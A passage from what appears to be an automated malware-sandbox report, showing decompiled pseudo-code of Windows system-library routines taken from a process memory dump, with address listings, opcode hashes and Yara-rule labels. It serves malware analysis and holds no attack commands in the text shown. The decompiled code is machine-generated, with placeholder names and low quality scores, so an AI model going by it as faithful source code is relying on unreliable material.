						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E00FEAAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x1098474 - 3;
										if( *0x1098474 != 3) {
											 *0x10979dc =  *0x10979dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E00FC7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E00FC7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E01027016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x1098708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x1097b00; // 0x0
							asm("ror esi, cl");
							 *0x109b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E00FE95D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E00FB7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x00fd03f1
0x00fd03f7
0x00fd03f9
0x00fd03fb
0x00fd03fd
0x00fd0400
0x00fd040a
0x01014c7a
0x00fd0537
0x00fd0547
0x00fd0410
0x00fd0410
0x00fd0414
0x00fd0417
0x00fd041a
0x00fd0421
0x00fd0424
0x00fd042b
0x00fd043b
0x00fd043e
0x00fd043f
0x00fd043f
0x00fd0446
0x00fd0449
0x00fd044c
0x00fd044f
0x00fd0459
0x01014c8d
0x00fd045f
0x00fd045f
0x00fd045f
0x00fd0467
0x01014c97
0x01014c9d
0x01014ca4
0x01014caa
0x01014caf
0x01014cb1
0x01014cc3
0x01014cb3
0x01014cbc
0x01014cbc
0x01014cc8
0x01014ccb
0x01014cd7
0x01014cda
0x01014cdf
0x01014cdf
0x01014ccb
0x01014ca4
0x00fd046d
0x00fd046f
0x00fd046f
0x00fd0471
0x00fd0476
0x00fd047a
0x00fd047b
0x00fd0483
0x00fd0489
0x00fd048d
0x00000000
0x00000000
0x01014ce9
0x01014cef
0x01014d22
0x01014d22
0x00000000
0x01014d22
0x01014cf1
0x01014cf7
0x00000000
0x00000000
0x01014cf9
0x01014cff
0x00000000
0x00000000
0x01014d05
0x01014d07
0x00000000
0x00000000
0x01014d0d
0x01014d0f
0x01014d14
0x01014d16
0x00000000
0x00000000
0x01014d1c
0x01014d1c
0x00fd0499
0x00fd0535
0x00fd0535
0x00000000
0x00fd0535
0x00fd04a6
0x01014d2c
0x01014d37
0x01014d39
0x01014d3b
0x00000000
0x00000000
0x01014d41
0x01014d48
0x00fd0527
0x00fd052b
0x00fd052d
0x00fd0530
0x00fd0530
0x00000000
0x00fd052b
0x01014d4e
0x00fd04ac
0x00fd04ac
0x00fd04af
0x00fd04b2
0x00fd04b7
0x00fd04b9
0x00fd04bb
0x00fd04bd
0x00fd04bf
0x00fd04c5
0x00fd04c9
0x01014d53
0x01014d59
0x01014db9
0x01014dba
0x01014dbf
0x01014dc2
0x01014dc4
0x01014dc7
0x01014dce
0x00000000
0x01014dce
0x01014d5b
0x01014d61
0x00000000
0x00000000
0x01014d63
0x01014d69
0x00000000
0x00000000
0x01014d6b
0x01014d6e
0x01014d74
0x01014d76
0x01014d7c
0x01014d7e
0x01014d84
0x01014d89
0x01014d8c
0x01014d8d
0x01014d92
0x01014d95
0x01014d96
0x01014d98
0x01014d9a
0x01014d9f
0x01014da4
0x01014da6
0x01014da8
0x01014daf
0x01014db1
0x01014db1
0x01014daf
0x01014da6
0x01014d84
0x01014d7c
0x00000000
0x01014d74
0x00fd04d6
0x01014de1
0x00fd04dc
0x00fd04dc
0x00fd04dc
0x00fd04e4
0x01014deb
0x01014df1
0x01014df8
0x01014dfe
0x01014e03
0x01014e05
0x01014e17
0x01014e07
0x01014e10
0x01014e10
0x01014e1c
0x01014e1f
0x01014e35
0x01014e35
0x01014e1f
0x01014df8
0x00fd04f1
0x00fd04fa
0x01014e3f
0x01014e47
0x01014e5b
0x01014e61
0x01014e67
0x01014e69
0x01014e71
0x01014e73
0x00fd0500
0x00fd0500
0x00fd0500
0x00fd04fa
0x00fd0508
0x00fd051d
0x00fd051d
0x00fd051f
0x00fd0524
0x00000000
0x00fd0524
0x00fd0515
0x00fd0517
0x01014e7a
0x01014e7c
0x00000000
0x00000000
0x01014e85
0x00000000
0x01014e85
0x00000000
0x00fd0517

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9de617459f4fb40ce43bba85f75a19acc88f063e4f23a09cca475de001f8335e
Instruction ID: 5861aaa5b76e265ceac1ce5ff68e5e9fd02b36a1b45964f00fc42426e5514532
Opcode Fuzzy Hash: 9de617459f4fb40ce43bba85f75a19acc88f063e4f23a09cca475de001f8335e
Instruction Fuzzy Hash: BD912831E002559BEF31EB68CC44BAD7BE5AB01724F190266FA91E73E5DB789C00DB81

Uniqueness

Uniqueness Score: -1.00%

Function 00FAC600, Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00FAC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x109d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E00FB6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E00FEB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x1097b9c; // 0x0
					_t74 = L00FC4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E00FE9650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L00FC77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E00FEF3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E00FE13C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L00FC77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E00FE9650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x00fac608
0x00fac615
0x00fac625
0x00fac62d
0x00fac635
0x00fac640
0x00fac680
0x00fac687
0x00fac688
0x00fac689
0x00fac694
0x00fac694
0x00fac642
0x00fac64a
0x00fac697
0x01017a25
0x01017a2b
0x01017a2e
0x01017a30
0x01017bea
0x01017bea
0x00000000
0x01017bea
0x01017a36
0x01017a43
0x01017a48
0x01017a4c
0x01017a4e
0x00000000
0x00000000
0x01017a58
0x01017a5a
0x01017a5b
0x01017a5c
0x01017a5d
0x01017a63
0x01017a64
0x01017a6a
0x01017a6c
0x01017a6e
0x010179cb
0x010179cb
0x010179ce
0x010179d0
0x01017a98
0x01017a9b
0x01017a9b
0x01017a9e
0x01017aa1
0x01017bbe
0x01017bbe
0x01017bc0
0x01017be0
0x01017be0
0x01017a01
0x01017a01
0x01017a05
0x01017a07
0x01017a15
0x01017a15
0x01017a1a
0x00000000
0x01017a1a
0x01017bc2
0x01017bc6
0x01017bc9
0x01017bcd
0x01017bcf
0x010179e6
0x010179e6
0x010179eb
0x010179eb
0x010179ef
0x010179f1
0x00000000
0x00000000
0x010179f3
0x010179f5
0x010179ff
0x010179ff
0x00000000
0x010179ff
0x010179f7
0x010179fd
0x00000000
0x00000000
0x00000000
0x010179fd
0x01017bd5
0x01017bd8
0x00000000
0x00000000
0x01017ba9
0x01017bac
0x01017bb0
0x01017bb1
0x01017bb1
0x01017bb6
0x00000000
0x01017bb6
0x01017aa7
0x01017aaa
0x00000000
0x00000000
0x01017ab2
0x01017ab3
0x01017ab5
0x01017aec
0x01017aef
0x01017b25
0x01017b28
0x01017b62
0x01017b64
0x01017b8f
0x01017b92
0x01017b96
0x01017b98
0x00000000
0x00000000
0x01017b9e
0x01017b9f
0x01017ba3
0x00000000
0x01017ba3
0x01017b66
0x01017b68
0x01017ae2
0x01017ae2
0x00000000
0x01017ae2
0x01017b6e
0x01017b72
0x01017b75
0x01017b81
0x01017b85
0x01017b87
0x00000000
0x00000000
0x01017b31
0x01017b34
0x01017b3c
0x01017b45
0x01017b46
0x01017b4f
0x01017b51
0x01017b57
0x01017b59
0x01017b59
0x00000000
0x01017b59
0x01017b77
0x00000000
0x01017b77
0x01017b2a
0x00000000
0x01017b2a
0x01017af1
0x01017af3
0x00000000
0x00000000
0x01017afb
0x01017afc
0x01017afe
0x00000000
0x00000000
0x01017b00
0x01017b03
0x00000000
0x00000000
0x01017b05
0x01017b09
0x01017b0d
0x01017b0f
0x00000000
0x00000000
0x01017b18
0x01017b1d
0x00000000
0x01017b1d
0x01017ab7
0x01017ab9
0x00000000
0x00000000
0x01017abf
0x01017ac1
0x00000000
0x00000000
0x01017ac3
0x01017ac6
0x00000000
0x00000000
0x01017ac8
0x01017acc
0x01017ad0
0x01017ad2
0x00000000
0x00000000
0x01017adb
0x00000000
0x01017adb
0x010179d6
0x010179d9
0x010179dc
0x01017a91
0x01017a94
0x00000000
0x01017a94
0x010179e2
0x00000000
0x010179e2
0x01017a74
0x01017a7a
0x00000000
0x00000000
0x01017a8a
0x01017a21
0x01017a21
0x00000000
0x01017a21
0x00fac650
0x00fac651
0x00fac656
0x00fac65c
0x00fac65d
0x00fac663
0x00fac664
0x00fac66a
0x00fac66e
0x010179c5
0x010179c7
0x00000000
0x010179c7
0x00fac67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c61b6739754f5d2ab8297ff63b2af590a309e46b148049ea25a5a29b71c716c
Instruction ID: abaa12493985ae1dc293f2b653b2e8a7348f5604a33016e9208909f6afec5a4b
Opcode Fuzzy Hash: 2c61b6739754f5d2ab8297ff63b2af590a309e46b148049ea25a5a29b71c716c
Instruction Fuzzy Hash: 7D81A3766042418FDB62CE58C881B6F77E5FB84350F14485EFE859B249D738ED44CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0103B8D0, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E0103B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x1097b9c; // 0x0
				_t124 = L00FC4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E00FE9800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E00FE95B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E00FE95D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L00FC77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E00FE9910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E00FE95D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x1097b9c; // 0x0
									_t92 = L00FC4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E00FE9910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E00FAA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0103E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0103E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E00FE95B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x0103b8d9
0x0103b8e4
0x00000000
0x0103b8e6
0x0103b8f3
0x0103b8f5
0x0103b8f5
0x0103b8f8
0x0103b920
0x0103b924
0x0103b936
0x0103b939
0x0103b93d
0x0103b948
0x0103b9a0
0x0103b9a0
0x0103b9a4
0x0103b9bf
0x0103b9c4
0x0103b9c6
0x0103b9cd
0x0103b9d1
0x0103bad4
0x0103bad8
0x0103bada
0x0103badc
0x0103badc
0x0103badf
0x0103bae0
0x0103bae2
0x0103bae4
0x0103baec
0x0103baee
0x0103baf0
0x0103baf0
0x0103baec
0x0103bafb
0x0103bafc
0x0103bafe
0x0103bb01
0x0103bb01
0x00000000
0x0103bb06
0x0103b9d7
0x0103b9db
0x0103b9db
0x0103b9de
0x0103b9de
0x0103b9e4
0x0103b9e7
0x0103b9ea
0x0103b9ec
0x0103b9ef
0x0103b9f3
0x0103ba1b
0x0103ba1b
0x0103ba23
0x0103ba24
0x0103ba27
0x0103ba2a
0x0103ba2b
0x0103ba2e
0x0103ba30
0x0103ba37
0x0103ba3f
0x0103ba9c
0x0103baa2
0x0103bb13
0x0103bb15
0x0103baae
0x0103baae
0x0103bab3
0x0103bab5
0x0103baba
0x0103bac8
0x0103bac8
0x0103baba
0x0103bacd
0x0103bacf
0x00000000
0x0103bacf
0x0103bb1a
0x00000000
0x0103bb1c
0x0103baa7
0x0103bb11
0x00000000
0x0103bb11
0x0103baa9
0x00000000
0x00000000
0x00000000
0x00000000
0x0103ba41
0x0103ba41
0x0103ba41
0x0103ba58
0x0103ba5d
0x0103ba62
0x00000000
0x00000000
0x0103ba64
0x0103ba67
0x0103ba68
0x0103ba69
0x0103ba6c
0x0103ba6f
0x0103ba71
0x0103ba78
0x0103ba80
0x00000000
0x00000000
0x0103ba90
0x0103ba90
0x0103ba97
0x00000000
0x0103ba97
0x0103b9f5
0x0103b9f7
0x0103b9f7
0x0103b9fa
0x0103ba03
0x0103ba07
0x0103ba0c
0x0103ba10
0x0103ba17
0x00000000
0x0103b9f7
0x0103b9a6
0x0103b9a8
0x0103b9af
0x0103b9b3
0x00000000
0x00000000
0x0103b9b9
0x00000000
0x0103b9b9
0x0103b94d
0x0103b98f
0x0103b995
0x0103b999
0x0103b960
0x0103b967
0x0103b968
0x0103b96a
0x00000000
0x0103b96a
0x0103b99b
0x0103b99e
0x00000000
0x00000000
0x00000000
0x0103b99e
0x0103b951
0x0103b954
0x0103b95a
0x0103b95e
0x0103b972
0x0103b979
0x0103b97d
0x0103b97f
0x0103b980
0x0103b982
0x0103b984
0x00000000
0x0103b984
0x00000000
0x0103b926
0x00000000
0x0103b926

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a14c37e26711cce6aff5a32ba78ccd1c89f0095a1b17ac53f096651febb350f
Instruction ID: 3db52eb19e15b0293c48cf6c8749fc6cd8ac11b0e2f24b3d939831bac86ea02c
Opcode Fuzzy Hash: 7a14c37e26711cce6aff5a32ba78ccd1c89f0095a1b17ac53f096651febb350f
Instruction Fuzzy Hash: D8712332200B01AFE732DF19CC45F6ABBE9EF80728F15452CE695872A1DBB5E941DB50

Uniqueness

Uniqueness Score: -1.00%

Function 01026DC9, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E01026DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L00FC4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E01026B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E00FC7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E00FE9AE0();
					_t87 = L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0102795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0102795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0102795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0102795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L00FC4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E01026B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E01026B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E01026B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E01026B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E00FC7D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E00FE9AE0();
								L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L00FC2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L00FC2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L00FC2400( &_v52);
							}
							if(_v28 >= 0) {
								return L00FC2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}

0x01026dd4
0x01026dde
0x01026de1
0x01026de3
0x01026de6
0x01026de9
0x01026dec
0x01026def
0x01026df2
0x01026df5
0x01026dfe
0x01026e04
0x01026e09
0x01026e0d
0x01026e18
0x01026e1b
0x01026e22
0x01026e2d
0x01026e30
0x01026e36
0x01026e42
0x01026e4d
0x01026e50
0x01026e55
0x01026e5c
0x01026e6e
0x01026e5e
0x01026e67
0x01026e67
0x01026e73
0x01026e74
0x01026e77
0x01026e7c
0x01026e7d
0x01026e8e
0x01026e93
0x01026e9c
0x01026ea8
0x01026eab
0x01026eac
0x01026eb3
0x01026ecd
0x01026edc
0x01026ee2
0x01026ee5
0x01026ef2
